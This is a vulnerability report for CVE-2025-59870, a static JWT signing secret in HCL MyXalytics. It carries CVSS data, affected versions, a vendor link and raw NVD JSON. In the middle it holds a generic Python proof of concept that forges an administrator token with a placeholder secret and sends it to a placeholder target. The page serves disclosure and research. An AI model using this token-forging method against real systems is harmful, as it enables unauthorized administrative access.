Security Vulnerability Report
CVE-2025-59870 CVSS 7.4 HIGH

CVE-2025-59870

Published: 2026-01-16 11:16:03
Last Modified: 2026-01-23 17:05:07

Description

HCL MyXalytics is affected by improper management of a static JWT signing secret in the web application, where the secret lacks rotation, introducing a security risk.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:myxalytics:6.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:myxalytics:6.3:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:myxalytics:6.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:myxalytics:6.5:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:myxalytics:6.6:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:myxalytics:6.7:*:*:*:*:*:*:* - VULNERABLE
HCL MyXalytics < known fixed version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import jwt
import requests

# Hard-coded JWT signing secret (must be obtained in practice)
JWT_SECRET = "hardcoded_secret_key_here"
TARGET_URL = "https://target.com/api/endpoint"

# Original JWT (obtained from a legitimate user or intercepted)
stolen_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."

# Decode the original token (without verifying the signature) to inspect its structure
decoded = jwt.decode(stolen_token, options={"verify_signature": False})
print(f"Original payload: {decoded}")

# Forge an administrator token
fake_payload = {
    "sub": "admin",
    "role": "administrator",
    "user_id": 1,
    "exp": 1737158400,
    "iat": 1737072000,
}

# Sign it with the hard-coded secret
fake_token = jwt.encode(fake_payload, JWT_SECRET, algorithm="HS256")
print(f"Forged token: {fake_token}")

# Send the forged token and check whether access is granted
headers = {"Authorization": f"Bearer {fake_token}"}
response = requests.get(TARGET_URL, headers=headers)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128115 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59870", "sourceIdentifier": "[email protected]", "published": "2026-01-16T11:16:02.660", "lastModified": "2026-01-23T17:05:07.123", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL MyXalytics  is affected by improper management of a static JWT signing secret in the web application, where the secret lacks rotation , introducing a security risk"}, {"lang": "es", "value": "HCL MyXalytics se ve afectado por la gestión inadecuada de un secreto de firma JWT estático en la aplicación web, donde el secreto carece de rotación, introduciendo un riesgo de seguridad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-323"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:myxalytics:6.2:*:*:*:*:*:*:*", "matchCriteriaId": "0C6F2615-0B25-4465-BE38-714313C9062F"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:hcltech:myxalytics:6.3:*:*:*:*:*:*:*", "matchCriteriaId": "79D5EDA2-6774-4B8A-A3AC-659FFC139B5F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:myxalytics:6.4:*:*:*:*:*:*:*", "matchCriteriaId": "8533B38F-22F2-4D0E-8276-6B8F86D826C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:myxalytics:6.5:*:*:*:*:*:*:*", "matchCriteriaId": "0774CC44-C753-433F-85C3-9934FEE6BC1F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:myxalytics:6.6:*:*:*:*:*:*:*", "matchCriteriaId": "20B1E85F-A207-4692-A491-8DAE3D00654F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:myxalytics:6.7:*:*:*:*:*:*:*", "matchCriteriaId": "2858C304-AFAB-4ECA-96F0-C90A97F7A2DC"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128115", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}